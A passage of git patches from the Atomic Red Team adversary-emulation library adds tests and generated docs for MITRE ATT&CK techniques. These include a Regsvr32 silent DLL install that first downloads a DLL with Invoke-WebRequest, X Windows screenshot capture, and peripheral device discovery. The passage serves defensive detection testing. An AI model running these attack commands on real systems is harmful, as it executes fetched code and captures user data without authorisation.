+ +## Atomic Test #5 - Regsvr32 Silent DLL Install Call DllRegisterServer +Regsvr32.exe is a command-line program used to register and unregister OLE controls. Normally, an install is executed with /n to prevent calling DllRegisterServer. + +**Supported Platforms:** Windows + + + + +#### Inputs: +| Name | Description | Type | Default Value | +|------|-------------|------|---------------| +| dll_name | Name of DLL to Install | String | PathToAtomicsFolder\T1218.010\bin\AllTheThingsx86.dll| +| regsvr32path | Default location of Regsvr32.exe | String | C:\Windows\system32| +| regsvr32name | Default name of Regsvr32.exe | String | regsvr32.exe| + + +#### Attack Commands: Run with `command_prompt`! + + +```cmd +#{regsvr32path}\#{regsvr32name} /s /i #{dll_name} +``` + + + + +#### Dependencies: Run with `powershell`! +##### Description: AllTheThingsx86.dll must exist on disk at specified location (#{dll_name}) +##### Check Prereq Commands: +```powershell +if (Test-Path #{dll_name}) {exit 0} else {exit 1} +``` +##### Get Prereq Commands: +```powershell +New-Item -Type Directory (split-path #{dll_name}) -ErrorAction ignore | Out-Null +Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1218.010/bin/AllTheThingsx86.dll" -OutFile "#{dll_name}" +``` + + + +
From 94791c8073430e3d0d377f7baa0635023d92f5ad Mon Sep 17 00:00:00 2001 From: Brian Thacker Date: Tue, 9 Feb 2021 12:51:53 -0600 Subject: [PATCH 105/131] T1113 x windows capture prereqs (#1382) * Update T1113.yaml Added prereq commands to test 3 "X Windows Capture" * Update T1113.yaml errors with multi-line if statement. Condensed to one line * Update T1113.yaml Changed prereqs of test 3 to be the redhat default. Changed prereqs of test 3 to have more input arguments * Update T1113.yaml Fixed typo in descriptions. Co-authored-by: Carrie Roberts --- atomics/T1113/T1113.yaml | 18 +++++++++++++++++- 1 file changed, 17 insertions(+), 1 deletion(-) diff --git a/atomics/T1113/T1113.yaml b/atomics/T1113/T1113.yaml index c0877cd9..53fd481e 100644 --- a/atomics/T1113/T1113.yaml +++ b/atomics/T1113/T1113.yaml @@ -46,6 +46,22 @@ atomic_tests: description: Output file path type: Path default: /tmp/T1113_desktop.xwd + package_checker: + description: Package checking command for linux. Debian system command- dpkg -s x11-apps + type: string + default: rpm -q xorg-x11-apps + package_installer: + description: Package installer command for linux. Debian system command- apt-get install x11-apps + type: string + default: yum install -y xorg-x11-apps + dependency_executor_name: bash + dependencies: + - description: | + Package with XWD and XWUD must exist on device + prereq_command: | + if #{package_checker} > /dev/null; then exit 0; else exit 1; fi + get_prereq_command: | + sudo #{package_installer} executor: command: | xwd -root -out #{output_file} @@ -101,4 +117,4 @@ atomic_tests: [W.U32]::mouse_event(0x02 -bor 0x04 -bor 0x01, 0, 0, 0, 0); cmd /c "timeout #{recording_time} > NULL && psr.exe /stop" cleanup_command: | - rm #{output_file} -ErrorAction Ignore \ No newline at end of file + rm #{output_file} -ErrorAction Ignore From e529ce5732cae362991a5cba6cb18607d30e7863 Mon Sep 17 00:00:00 2001 From: CircleCI Atomic Red Team doc generator Date: Tue, 9 Feb 2021 18:52:32 +0000 Subject: [PATCH 106/131] Generate docs from job=generate_and_commit_guids_and_docs branch=master [skip ci] --- atomics/Indexes/index.yaml | 24 +++++++++++++++++++++++- atomics/T1113/T1113.md | 14 ++++++++++++++ 2 files changed, 37 insertions(+), 1 deletion(-) diff --git a/atomics/Indexes/index.yaml b/atomics/Indexes/index.yaml index 840fc4ae..29023d04 100644 --- a/atomics/Indexes/index.yaml +++ b/atomics/Indexes/index.yaml @@ -25401,6 +25401,26 @@ collection: description: Output file path type: Path default: "/tmp/T1113_desktop.xwd" + package_checker: + description: Package checking command for linux. Debian system command- + dpkg -s x11-apps + type: string + default: rpm -q xorg-x11-apps + package_installer: + description: Package installer command for linux. Debian system command- + apt-get install x11-apps + type: string + default: yum install -y xorg-x11-apps + dependency_executor_name: bash + dependencies: + - description: 'Package with XWD and XWUD must exist on device + +' + prereq_command: 'if #{package_checker} > /dev/null; then exit 0; else exit + 1; fi + +' + get_prereq_command: "sudo #{package_installer} \n" executor: command: | xwd -root -out #{output_file} @@ -25465,7 +25485,9 @@ collection: Add-Type -MemberDefinition '[DllImport("user32.dll")] public static extern void mouse_event(int flags, int dx, int dy, int cButtons, int info);' -Name U32 -Namespace W; [W.U32]::mouse_event(0x02 -bor 0x04 -bor 0x01, 0, 0, 0, 0); cmd /c "timeout #{recording_time} > NULL && psr.exe /stop" - cleanup_command: 'rm #{output_file} -ErrorAction Ignore' + cleanup_command: 'rm #{output_file} -ErrorAction Ignore + +' T1213.002: technique: external_references: diff --git a/atomics/T1113/T1113.md b/atomics/T1113/T1113.md index 84f0b682..5b2fae75 100644 --- a/atomics/T1113/T1113.md +++ b/atomics/T1113/T1113.md @@ -96,6 +96,8 @@ Use xwd command to collect a full desktop screenshot and review file with xwud | Name | Description | Type | Default Value | |------|-------------|------|---------------| | output_file | Output file path | Path | /tmp/T1113_desktop.xwd| +| package_checker | Package checking command for linux. Debian system command- dpkg -s x11-apps | string | rpm -q xorg-x11-apps| +| package_installer | Package installer command for linux. Debian system command- apt-get install x11-apps | string | yum install -y xorg-x11-apps| #### Attack Commands: Run with `bash`! @@ -113,6 +115,18 @@ rm #{output_file} +#### Dependencies: Run with `bash`! +##### Description: Package with XWD and XWUD must exist on device +##### Check Prereq Commands: +```bash +if #{package_checker} > /dev/null; then exit 0; else exit 1; fi +``` +##### Get Prereq Commands: +```bash +sudo #{package_installer} +``` + +
From 3fcf639acf2e59222c9c1ee1470d9abc67a0ccdd Mon Sep 17 00:00:00 2001 From: jtothef Date: Thu, 11 Feb 2021 08:05:39 -0600 Subject: [PATCH 107/131] Create T1120.yaml (#1387) --- atomics/T1120/T1120.yaml | 14 ++++++++++++++ 1 file changed, 14 insertions(+) create mode 100644 atomics/T1120/T1120.yaml diff --git a/atomics/T1120/T1120.yaml b/atomics/T1120/T1120.yaml new file mode 100644 index 00000000..e2493565 --- /dev/null +++ b/atomics/T1120/T1120.yaml @@ -0,0 +1,14 @@ +attack_technique: T1120 +display_name: Peripheral Device Discovery +atomic_tests: +- name: Win32_PnPEntity Hardware Inventory + description: Perform peripheral device discovery using Get-WMIObject Win32_PnPEntity + supported_platforms: + - windows + executor: + command: |- + Get-WMIObject Win32_PnPEntity | Format-Table Name, Description, Manufacturer > $env:TEMP\T1120_collection.txt + $Space,$Heading,$Break,$Data = Get-Content $env:TEMP\T1120_collection.txt + @($Heading; $Break; $Data |Sort-Object -Unique) | ? {$_.trim() -ne "" } |Set-Content $env:TEMP\T1120_collection.txt + cleanup_command: Remove-Item $env:TEMP\T1120_collection.txt -ErrorAction Ignore + name: powershell From af5fbff0f2b5bfc6aa8f8421a6ca5c75f1b5d2af Mon Sep 17 00:00:00 2001 From: CircleCI Atomic Red Team GUID generator Date: Thu, 11 Feb 2021 14:05:53 +0000 Subject: [PATCH 108/131] Generate GUIDs from job=generate_and_commit_guids_and_docs branch=master [skip ci] --- atomics/T1120/T1120.yaml | 1 + atomics/used_guids.txt | 1 + 2 files changed, 2 insertions(+) diff --git a/atomics/T1120/T1120.yaml b/atomics/T1120/T1120.yaml index e2493565..13abdf15 100644 --- a/atomics/T1120/T1120.yaml +++ b/atomics/T1120/T1120.yaml @@ -2,6 +2,7 @@ attack_technique: T1120 display_name: Peripheral Device Discovery atomic_tests: - name: Win32_PnPEntity Hardware Inventory + auto_generated_guid: 2cb4dbf2-2dca-4597-8678-4d39d207a3a5 description: Perform peripheral device discovery using Get-WMIObject Win32_PnPEntity supported_platforms: - windows diff --git a/atomics/used_guids.txt b/atomics/used_guids.txt index fdd04b7f..34a68e85 100644 --- a/atomics/used_guids.txt +++ b/atomics/used_guids.txt @@ -658,3 +658,4 @@ ab042179-c0c5-402f-9bc8-42741f5ce359 7cede33f-0acd-44ef-9774-15511300b24b 5102a3a7-e2d7-4129-9e45-f483f2e0eea8 9d71c492-ea2e-4c08-af16-c6994cdf029f +2cb4dbf2-2dca-4597-8678-4d39d207a3a5 From e136a49db2497ffdf91fa0d32826dc1816637554 Mon Sep 17 00:00:00 2001 From: CircleCI Atomic Red Team doc generator Date: Thu, 11 Feb 2021 14:06:01 +0000 Subject: [PATCH 109/131] Generate docs from job=generate_and_commit_guids_and_docs branch=master [skip ci] --- .../art-navigator-layer-windows.json | 2 +- .../art-navigator-layer.json | 2 +- atomics/Indexes/Indexes-CSV/index.csv | 1 + atomics/Indexes/Indexes-CSV/windows-index.csv | 1 + atomics/Indexes/Indexes-Markdown/index.md | 3 +- .../Indexes/Indexes-Markdown/windows-index.md | 3 +- atomics/Indexes/Matrices/matrix.md | 2 +- atomics/Indexes/Matrices/windows-matrix.md | 2 +- atomics/Indexes/index.yaml | 15 ++++++- atomics/T1120/T1120.md | 39 +++++++++++++++++++ 10 files changed, 63 insertions(+), 7 deletions(-) create mode 100644 atomics/T1120/T1120.md diff --git a/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-windows.json b/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-windows.json index 15536687..e81b9369 100644 --- a/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-windows.json +++ b/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-windows.json @@ -1 +1 @@ -{"version":"3.0","name":"Atomic Red Team (Windows)","description":"Atomic Red Team (Windows) MITRE ATT&CK Navigator Layer","domain":"mitre-enterprise","gradient":{"colors":["#ce232e","#ce232e"],"minValue":0,"maxValue":100},"legendItems":[{"label":"Has at least one test","color":"#ce232e"}],"techniques":[{"techniqueID":"T1003.001","score":100,"enabled":true},{"techniqueID":"T1003","score":100,"enabled":true},{"techniqueID":"T1003.002","score":100,"enabled":true},{"techniqueID":"T1003.003","score":100,"enabled":true},{"techniqueID":"T1003.004","score":100,"enabled":true},{"techniqueID":"T1003.006","score":100,"enabled":true},{"techniqueID":"T1003","score":100,"enabled":true},{"techniqueID":"T1006","score":100,"enabled":true},{"techniqueID":"T1007","score":100,"enabled":true},{"techniqueID":"T1010","score":100,"enabled":true},{"techniqueID":"T1012","score":100,"enabled":true},{"techniqueID":"T1014","score":100,"enabled":true},{"techniqueID":"T1016","score":100,"enabled":true},{"techniqueID":"T1018","score":100,"enabled":true},{"techniqueID":"T1020","score":100,"enabled":true},{"techniqueID":"T1021.001","score":100,"enabled":true},{"techniqueID":"T1021","score":100,"enabled":true},{"techniqueID":"T1021.002","score":100,"enabled":true},{"techniqueID":"T1021.003","score":100,"enabled":true},{"techniqueID":"T1021.006","score":100,"enabled":true},{"techniqueID":"T1027.004","score":100,"enabled":true},{"techniqueID":"T1027","score":100,"enabled":true},{"techniqueID":"T1027","score":100,"enabled":true},{"techniqueID":"T1033","score":100,"enabled":true},{"techniqueID":"T1036.003","score":100,"enabled":true},{"techniqueID":"T1036","score":100,"enabled":true},{"techniqueID":"T1036.004","score":100,"enabled":true},{"techniqueID":"T1037.001","score":100,"enabled":true},{"techniqueID":"T1037","score":100,"enabled":true},{"techniqueID":"T1040","score":100,"enabled":true},{"techniqueID":"T1046","score":100,"enabled":true},{"techniqueID":"T1047","score":100,"enabled":true},{"techniqueID":"T1048.003","score":100,"enabled":true},{"techniqueID":"T1048","score":100,"enabled":true},{"techniqueID":"T1049","score":100,"enabled":true},{"techniqueID":"T1053.002","score":100,"enabled":true},{"techniqueID":"T1053","score":100,"enabled":true},{"techniqueID":"T1053.005","score":100,"enabled":true},{"techniqueID":"T1055.004","score":100,"enabled":true},{"techniqueID":"T1055","score":100,"enabled":true},{"techniqueID":"T1055.012","score":100,"enabled":true},{"techniqueID":"T1055","score":100,"enabled":true},{"techniqueID":"T1056.001","score":100,"enabled":true},{"techniqueID":"T1056","score":100,"enabled":true},{"techniqueID":"T1056.002","score":100,"enabled":true},{"techniqueID":"T1056.004","score":100,"enabled":true},{"techniqueID":"T1057","score":100,"enabled":true},{"techniqueID":"T1059.001","score":100,"enabled":true},{"techniqueID":"T1059","score":100,"enabled":true},{"techniqueID":"T1059.003","score":100,"enabled":true},{"techniqueID":"T1059.005","score":100,"enabled":true},{"techniqueID":"T1069.001","score":100,"enabled":true},{"techniqueID":"T1069","score":100,"enabled":true},{"techniqueID":"T1069.002","score":100,"enabled":true},{"techniqueID":"T1070.001","score":100,"enabled":true},{"techniqueID":"T1070","score":100,"enabled":true},{"techniqueID":"T1070.003","score":100,"enabled":true},{"techniqueID":"T1070.004","score":100,"enabled":true},{"techniqueID":"T1070.005","score":100,"enabled":true},{"techniqueID":"T1070.006","score":100,"enabled":true},{"techniqueID":"T1070","score":100,"enabled":true},{"techniqueID":"T1071.001","score":100,"enabled":true},{"techniqueID":"T1071","score":100,"enabled":true},{"techniqueID":"T1071.004","score":100,"enabled":true},{"techniqueID":"T1074.001","score":100,"enabled":true},{"techniqueID":"T1074","score":100,"enabled":true},{"techniqueID":"T1078.001","score":100,"enabled":true},{"techniqueID":"T1078","score":100,"enabled":true},{"techniqueID":"T1078.003","score":100,"enabled":true},{"techniqueID":"T1082","score":100,"enabled":true},{"techniqueID":"T1083","score":100,"enabled":true},{"techniqueID":"T1087.001","score":100,"enabled":true},{"techniqueID":"T1087","score":100,"enabled":true},{"techniqueID":"T1087.002","score":100,"enabled":true},{"techniqueID":"T1090.001","score":100,"enabled":true},{"techniqueID":"T1090","score":100,"enabled":true},{"techniqueID":"T1095","score":100,"enabled":true},{"techniqueID":"T1098","score":100,"enabled":true},{"techniqueID":"T1105","score":100,"enabled":true},{"techniqueID":"T1106","score":100,"enabled":true},{"techniqueID":"T1110.001","score":100,"enabled":true},{"techniqueID":"T1110","score":100,"enabled":true},{"techniqueID":"T1110.002","score":100,"enabled":true},{"techniqueID":"T1110.003","score":100,"enabled":true},{"techniqueID":"T1112","score":100,"enabled":true},{"techniqueID":"T1113","score":100,"enabled":true},{"techniqueID":"T1114.001","score":100,"enabled":true},{"techniqueID":"T1114","score":100,"enabled":true},{"techniqueID":"T1115","score":100,"enabled":true},{"techniqueID":"T1119","score":100,"enabled":true},{"techniqueID":"T1123","score":100,"enabled":true},{"techniqueID":"T1124","score":100,"enabled":true},{"techniqueID":"T1127.001","score":100,"enabled":true},{"techniqueID":"T1127","score":100,"enabled":true},{"techniqueID":"T1133","score":100,"enabled":true},{"techniqueID":"T1134.001","score":100,"enabled":true},{"techniqueID":"T1134","score":100,"enabled":true},{"techniqueID":"T1134.004","score":100,"enabled":true},{"techniqueID":"T1135","score":100,"enabled":true},{"techniqueID":"T1136.001","score":100,"enabled":true},{"techniqueID":"T1136","score":100,"enabled":true},{"techniqueID":"T1136.002","score":100,"enabled":true},{"techniqueID":"T1137.002","score":100,"enabled":true},{"techniqueID":"T1137","score":100,"enabled":true},{"techniqueID":"T1140","score":100,"enabled":true},{"techniqueID":"T1176","score":100,"enabled":true},{"techniqueID":"T1197","score":100,"enabled":true},{"techniqueID":"T1201","score":100,"enabled":true},{"techniqueID":"T1202","score":100,"enabled":true},{"techniqueID":"T1204.002","score":100,"enabled":true},{"techniqueID":"T1204","score":100,"enabled":true},{"techniqueID":"T1207","score":100,"enabled":true},{"techniqueID":"T1216.001","score":100,"enabled":true},{"techniqueID":"T1216","score":100,"enabled":true},{"techniqueID":"T1216","score":100,"enabled":true},{"techniqueID":"T1217","score":100,"enabled":true},{"techniqueID":"T1218.001","score":100,"enabled":true},{"techniqueID":"T1218","score":100,"enabled":true},{"techniqueID":"T1218.002","score":100,"enabled":true},{"techniqueID":"T1218.003","score":100,"enabled":true},{"techniqueID":"T1218.004","score":100,"enabled":true},{"techniqueID":"T1218.005","score":100,"enabled":true},{"techniqueID":"T1218.007","score":100,"enabled":true},{"techniqueID":"T1218.008","score":100,"enabled":true},{"techniqueID":"T1218.009","score":100,"enabled":true},{"techniqueID":"T1218.010","score":100,"enabled":true},{"techniqueID":"T1218.011","score":100,"enabled":true},{"techniqueID":"T1218","score":100,"enabled":true},{"techniqueID":"T1219","score":100,"enabled":true},{"techniqueID":"T1220","score":100,"enabled":true},{"techniqueID":"T1222.001","score":100,"enabled":true},{"techniqueID":"T1222","score":100,"enabled":true},{"techniqueID":"T1482","score":100,"enabled":true},{"techniqueID":"T1485","score":100,"enabled":true},{"techniqueID":"T1489","score":100,"enabled":true},{"techniqueID":"T1490","score":100,"enabled":true},{"techniqueID":"T1497.001","score":100,"enabled":true},{"techniqueID":"T1497","score":100,"enabled":true},{"techniqueID":"T1505.002","score":100,"enabled":true},{"techniqueID":"T1505","score":100,"enabled":true},{"techniqueID":"T1505.003","score":100,"enabled":true},{"techniqueID":"T1518.001","score":100,"enabled":true},{"techniqueID":"T1518","score":100,"enabled":true},{"techniqueID":"T1518","score":100,"enabled":true},{"techniqueID":"T1529","score":100,"enabled":true},{"techniqueID":"T1531","score":100,"enabled":true},{"techniqueID":"T1543.003","score":100,"enabled":true},{"techniqueID":"T1543","score":100,"enabled":true},{"techniqueID":"T1546.001","score":100,"enabled":true},{"techniqueID":"T1546","score":100,"enabled":true},{"techniqueID":"T1546.002","score":100,"enabled":true},{"techniqueID":"T1546.003","score":100,"enabled":true},{"techniqueID":"T1546.007","score":100,"enabled":true},{"techniqueID":"T1546.008","score":100,"enabled":true},{"techniqueID":"T1546.010","score":100,"enabled":true},{"techniqueID":"T1546.011","score":100,"enabled":true},{"techniqueID":"T1546.012","score":100,"enabled":true},{"techniqueID":"T1546.013","score":100,"enabled":true},{"techniqueID":"T1547.001","score":100,"enabled":true},{"techniqueID":"T1547","score":100,"enabled":true},{"techniqueID":"T1547.004","score":100,"enabled":true},{"techniqueID":"T1547.005","score":100,"enabled":true},{"techniqueID":"T1547.009","score":100,"enabled":true},{"techniqueID":"T1548.002","score":100,"enabled":true},{"techniqueID":"T1548","score":100,"enabled":true},{"techniqueID":"T1550.002","score":100,"enabled":true},{"techniqueID":"T1550","score":100,"enabled":true},{"techniqueID":"T1550.003","score":100,"enabled":true},{"techniqueID":"T1552.001","score":100,"enabled":true},{"techniqueID":"T1552","score":100,"enabled":true},{"techniqueID":"T1552.002","score":100,"enabled":true},{"techniqueID":"T1552.004","score":100,"enabled":true},{"techniqueID":"T1552.006","score":100,"enabled":true},{"techniqueID":"T1553.004","score":100,"enabled":true},{"techniqueID":"T1553","score":100,"enabled":true},{"techniqueID":"T1555.003","score":100,"enabled":true},{"techniqueID":"T1555","score":100,"enabled":true},{"techniqueID":"T1555","score":100,"enabled":true},{"techniqueID":"T1556.002","score":100,"enabled":true},{"techniqueID":"T1556","score":100,"enabled":true},{"techniqueID":"T1558.001","score":100,"enabled":true},{"techniqueID":"T1558","score":100,"enabled":true},{"techniqueID":"T1558.003","score":100,"enabled":true},{"techniqueID":"T1559.002","score":100,"enabled":true},{"techniqueID":"T1559","score":100,"enabled":true},{"techniqueID":"T1560.001","score":100,"enabled":true},{"techniqueID":"T1560","score":100,"enabled":true},{"techniqueID":"T1560","score":100,"enabled":true},{"techniqueID":"T1562.001","score":100,"enabled":true},{"techniqueID":"T1562","score":100,"enabled":true},{"techniqueID":"T1562.002","score":100,"enabled":true},{"techniqueID":"T1562.004","score":100,"enabled":true},{"techniqueID":"T1563.002","score":100,"enabled":true},{"techniqueID":"T1563","score":100,"enabled":true},{"techniqueID":"T1564.001","score":100,"enabled":true},{"techniqueID":"T1564","score":100,"enabled":true},{"techniqueID":"T1564.003","score":100,"enabled":true},{"techniqueID":"T1564.004","score":100,"enabled":true},{"techniqueID":"T1564","score":100,"enabled":true},{"techniqueID":"T1566.001","score":100,"enabled":true},{"techniqueID":"T1566","score":100,"enabled":true},{"techniqueID":"T1569.002","score":100,"enabled":true},{"techniqueID":"T1569","score":100,"enabled":true},{"techniqueID":"T1571","score":100,"enabled":true},{"techniqueID":"T1573","score":100,"enabled":true},{"techniqueID":"T1574.001","score":100,"enabled":true},{"techniqueID":"T1574","score":100,"enabled":true},{"techniqueID":"T1574.002","score":100,"enabled":true},{"techniqueID":"T1574.009","score":100,"enabled":true},{"techniqueID":"T1574.011","score":100,"enabled":true},{"techniqueID":"T1574.012","score":100,"enabled":true}]} \ No newline at end of file +{"version":"3.0","name":"Atomic Red Team (Windows)","description":"Atomic Red Team (Windows) MITRE ATT&CK Navigator Layer","domain":"mitre-enterprise","gradient":{"colors":["#ce232e","#ce232e"],"minValue":0,"maxValue":100},"legendItems":[{"label":"Has at least one test","color":"#ce232e"}],"techniques":[{"techniqueID":"T1003.001","score":100,"enabled":true},{"techniqueID":"T1003","score":100,"enabled":true},{"techniqueID":"T1003.002","score":100,"enabled":true},{"techniqueID":"T1003.003","score":100,"enabled":true},{"techniqueID":"T1003.004","score":100,"enabled":true},{"techniqueID":"T1003.006","score":100,"enabled":true},{"techniqueID":"T1003","score":100,"enabled":true},{"techniqueID":"T1006","score":100,"enabled":true},{"techniqueID":"T1007","score":100,"enabled":true},{"techniqueID":"T1010","score":100,"enabled":true},{"techniqueID":"T1012","score":100,"enabled":true},{"techniqueID":"T1014","score":100,"enabled":true},{"techniqueID":"T1016","score":100,"enabled":true},{"techniqueID":"T1018","score":100,"enabled":true},{"techniqueID":"T1020","score":100,"enabled":true},{"techniqueID":"T1021.001","score":100,"enabled":true},{"techniqueID":"T1021","score":100,"enabled":true},{"techniqueID":"T1021.002","score":100,"enabled":true},{"techniqueID":"T1021.003","score":100,"enabled":true},{"techniqueID":"T1021.006","score":100,"enabled":true},{"techniqueID":"T1027.004","score":100,"enabled":true},{"techniqueID":"T1027","score":100,"enabled":true},{"techniqueID":"T1027","score":100,"enabled":true},{"techniqueID":"T1033","score":100,"enabled":true},{"techniqueID":"T1036.003","score":100,"enabled":true},{"techniqueID":"T1036","score":100,"enabled":true},{"techniqueID":"T1036.004","score":100,"enabled":true},{"techniqueID":"T1037.001","score":100,"enabled":true},{"techniqueID":"T1037","score":100,"enabled":true},{"techniqueID":"T1040","score":100,"enabled":true},{"techniqueID":"T1046","score":100,"enabled":true},{"techniqueID":"T1047","score":100,"enabled":true},{"techniqueID":"T1048.003","score":100,"enabled":true},{"techniqueID":"T1048","score":100,"enabled":true},{"techniqueID":"T1049","score":100,"enabled":true},{"techniqueID":"T1053.002","score":100,"enabled":true},{"techniqueID":"T1053","score":100,"enabled":true},{"techniqueID":"T1053.005","score":100,"enabled":true},{"techniqueID":"T1055.004","score":100,"enabled":true},{"techniqueID":"T1055","score":100,"enabled":true},{"techniqueID":"T1055.012","score":100,"enabled":true},{"techniqueID":"T1055","score":100,"enabled":true},{"techniqueID":"T1056.001","score":100,"enabled":true},{"techniqueID":"T1056","score":100,"enabled":true},{"techniqueID":"T1056.002","score":100,"enabled":true},{"techniqueID":"T1056.004","score":100,"enabled":true},{"techniqueID":"T1057","score":100,"enabled":true},{"techniqueID":"T1059.001","score":100,"enabled":true},{"techniqueID":"T1059","score":100,"enabled":true},{"techniqueID":"T1059.003","score":100,"enabled":true},{"techniqueID":"T1059.005","score":100,"enabled":true},{"techniqueID":"T1069.001","score":100,"enabled":true},{"techniqueID":"T1069","score":100,"enabled":true},{"techniqueID":"T1069.002","score":100,"enabled":true},{"techniqueID":"T1070.001","score":100,"enabled":true},{"techniqueID":"T1070","score":100,"enabled":true},{"techniqueID":"T1070.003","score":100,"enabled":true},{"techniqueID":"T1070.004","score":100,"enabled":true},{"techniqueID":"T1070.005","score":100,"enabled":true},{"techniqueID":"T1070.006","score":100,"enabled":true},{"techniqueID":"T1070","score":100,"enabled":true},{"techniqueID":"T1071.001","score":100,"enabled":true},{"techniqueID":"T1071","score":100,"enabled":true},{"techniqueID":"T1071.004","score":100,"enabled":true},{"techniqueID":"T1074.001","score":100,"enabled":true},{"techniqueID":"T1074","score":100,"enabled":true},{"techniqueID":"T1078.001","score":100,"enabled":true},{"techniqueID":"T1078","score":100,"enabled":true},{"techniqueID":"T1078.003","score":100,"enabled":true},{"techniqueID":"T1082","score":100,"enabled":true},{"techniqueID":"T1083","score":100,"enabled":true},{"techniqueID":"T1087.001","score":100,"enabled":true},{"techniqueID":"T1087","score":100,"enabled":true},{"techniqueID":"T1087.002","score":100,"enabled":true},{"techniqueID":"T1090.001","score":100,"enabled":true},{"techniqueID":"T1090","score":100,"enabled":true},{"techniqueID":"T1095","score":100,"enabled":true},{"techniqueID":"T1098","score":100,"enabled":true},{"techniqueID":"T1105","score":100,"enabled":true},{"techniqueID":"T1106","score":100,"enabled":true},{"techniqueID":"T1110.001","score":100,"enabled":true},{"techniqueID":"T1110","score":100,"enabled":true},{"techniqueID":"T1110.002","score":100,"enabled":true},{"techniqueID":"T1110.003","score":100,"enabled":true},{"techniqueID":"T1112","score":100,"enabled":true},{"techniqueID":"T1113","score":100,"enabled":true},{"techniqueID":"T1114.001","score":100,"enabled":true},{"techniqueID":"T1114","score":100,"enabled":true},{"techniqueID":"T1115","score":100,"enabled":true},{"techniqueID":"T1119","score":100,"enabled":true},{"techniqueID":"T1120","score":100,"enabled":true},{"techniqueID":"T1123","score":100,"enabled":true},{"techniqueID":"T1124","score":100,"enabled":true},{"techniqueID":"T1127.001","score":100,"enabled":true},{"techniqueID":"T1127","score":100,"enabled":true},{"techniqueID":"T1133","score":100,"enabled":true},{"techniqueID":"T1134.001","score":100,"enabled":true},{"techniqueID":"T1134","score":100,"enabled":true},{"techniqueID":"T1134.004","score":100,"enabled":true},{"techniqueID":"T1135","score":100,"enabled":true},{"techniqueID":"T1136.001","score":100,"enabled":true},{"techniqueID":"T1136","score":100,"enabled":true},{"techniqueID":"T1136.002","score":100,"enabled":true},{"techniqueID":"T1137.002","score":100,"enabled":true},{"techniqueID":"T1137","score":100,"enabled":true},{"techniqueID":"T1140","score":100,"enabled":true},{"techniqueID":"T1176","score":100,"enabled":true},{"techniqueID":"T1197","score":100,"enabled":true},{"techniqueID":"T1201","score":100,"enabled":true},{"techniqueID":"T1202","score":100,"enabled":true},{"techniqueID":"T1204.002","score":100,"enabled":true},{"techniqueID":"T1204","score":100,"enabled":true},{"techniqueID":"T1207","score":100,"enabled":true},{"techniqueID":"T1216.001","score":100,"enabled":true},{"techniqueID":"T1216","score":100,"enabled":true},{"techniqueID":"T1216","score":100,"enabled":true},{"techniqueID":"T1217","score":100,"enabled":true},{"techniqueID":"T1218.001","score":100,"enabled":true},{"techniqueID":"T1218","score":100,"enabled":true},{"techniqueID":"T1218.002","score":100,"enabled":true},{"techniqueID":"T1218.003","score":100,"enabled":true},{"techniqueID":"T1218.004","score":100,"enabled":true},{"techniqueID":"T1218.005","score":100,"enabled":true},{"techniqueID":"T1218.007","score":100,"enabled":true},{"techniqueID":"T1218.008","score":100,"enabled":true},{"techniqueID":"T1218.009","score":100,"enabled":true},{"techniqueID":"T1218.010","score":100,"enabled":true},{"techniqueID":"T1218.011","score":100,"enabled":true},{"techniqueID":"T1218","score":100,"enabled":true},{"techniqueID":"T1219","score":100,"enabled":true},{"techniqueID":"T1220","score":100,"enabled":true},{"techniqueID":"T1222.001","score":100,"enabled":true},{"techniqueID":"T1222","score":100,"enabled":true},{"techniqueID":"T1482","score":100,"enabled":true},{"techniqueID":"T1485","score":100,"enabled":true},{"techniqueID":"T1489","score":100,"enabled":true},{"techniqueID":"T1490","score":100,"enabled":true},{"techniqueID":"T1497.001","score":100,"enabled":true},{"techniqueID":"T1497","score":100,"enabled":true},{"techniqueID":"T1505.002","score":100,"enabled":true},{"techniqueID":"T1505","score":100,"enabled":true},{"techniqueID":"T1505.003","score":100,"enabled":true},{"techniqueID":"T1518.001","score":100,"enabled":true},{"techniqueID":"T1518","score":100,"enabled":true},{"techniqueID":"T1518","score":100,"enabled":true},{"techniqueID":"T1529","score":100,"enabled":true},{"techniqueID":"T1531","score":100,"enabled":true},{"techniqueID":"T1543.003","score":100,"enabled":true},{"techniqueID":"T1543","score":100,"enabled":true},{"techniqueID":"T1546.001","score":100,"enabled":true},{"techniqueID":"T1546","score":100,"enabled":true},{"techniqueID":"T1546.002","score":100,"enabled":true},{"techniqueID":"T1546.003","score":100,"enabled":true},{"techniqueID":"T1546.007","score":100,"enabled":true},{"techniqueID":"T1546.008","score":100,"enabled":true},{"techniqueID":"T1546.010","score":100,"enabled":true},{"techniqueID":"T1546.011","score":100,"enabled":true},{"techniqueID":"T1546.012","score":100,"enabled":true},{"techniqueID":"T1546.013","score":100,"enabled":true},{"techniqueID":"T1547.001","score":100,"enabled":true},{"techniqueID":"T1547","score":100,"enabled":true},{"techniqueID":"T1547.004","score":100,"enabled":true},{"techniqueID":"T1547.005","score":100,"enabled":true},{"techniqueID":"T1547.009","score":100,"enabled":true},{"techniqueID":"T1548.002","score":100,"enabled":true},{"techniqueID":"T1548","score":100,"enabled":true},{"techniqueID":"T1550.002","score":100,"enabled":true},{"techniqueID":"T1550","score":100,"enabled":true},{"techniqueID":"T1550.003","score":100,"enabled":true},{"techniqueID":"T1552.001","score":100,"enabled":true},{"techniqueID":"T1552","score":100,"enabled":true},{"techniqueID":"T1552.002","score":100,"enabled":true},{"techniqueID":"T1552.004","score":100,"enabled":true},{"techniqueID":"T1552.006","score":100,"enabled":true},{"techniqueID":"T1553.004","score":100,"enabled":true},{"techniqueID":"T1553","score":100,"enabled":true},{"techniqueID":"T1555.003","score":100,"enabled":true},{"techniqueID":"T1555","score":100,"enabled":true},{"techniqueID":"T1555","score":100,"enabled":true},{"techniqueID":"T1556.002","score":100,"enabled":true},{"techniqueID":"T1556","score":100,"enabled":true},{"techniqueID":"T1558.001","score":100,"enabled":true},{"techniqueID":"T1558","score":100,"enabled":true},{"techniqueID":"T1558.003","score":100,"enabled":true},{"techniqueID":"T1559.002","score":100,"enabled":true},{"techniqueID":"T1559","score":100,"enabled":true},{"techniqueID":"T1560.001","score":100,"enabled":true},{"techniqueID":"T1560","score":100,"enabled":true},{"techniqueID":"T1560","score":100,"enabled":true},{"techniqueID":"T1562.001","score":100,"enabled":true},{"techniqueID":"T1562","score":100,"enabled":true},{"techniqueID"